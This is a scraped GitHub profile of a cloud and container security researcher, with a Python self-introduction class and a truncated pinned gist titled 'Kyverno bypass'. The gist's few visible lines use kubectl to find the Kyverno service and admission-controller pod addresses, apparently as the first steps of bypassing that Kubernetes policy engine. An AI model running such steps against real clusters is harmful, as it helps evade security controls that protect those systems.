class DevSecOps:
def __init__(self):
self.name = "Sergey Kanibor"
self.linkedin = "https://www.linkedin.com/in/r0binak/"
self.email = "r081n4k@gmail.com"
self.area = "Cloud & Container security, Pentest Web, Infra, Bug Hunter"
if __name__ == "__main__":
r0binak = DevSecOps()
🗳️
kubectl auth can-i --list
Highlights
- Pro
Pinned Loading
-
Kyverno bypass
Kyverno bypass 1SVCIP="$(kubectl get svc -n kyverno kyverno-svc --output jsonpath='{.spec.clusterIP}')"
2PODNAME="$(kubectl get pod -n kyverno -l app.kubernetes.io/component=admission-controller --output name | sed -e 's/^pod\///g')"
3PODIP="$(kubectl get pod -n kyverno $PODNAME --output jsonpath='{.status.podIP}')"
45kubectl apply -f - <<EOF
Something went wrong, please refresh the page to try again.
If the problem persists, check the GitHub status page or contact support.
If the problem persists, check the GitHub status page or contact support.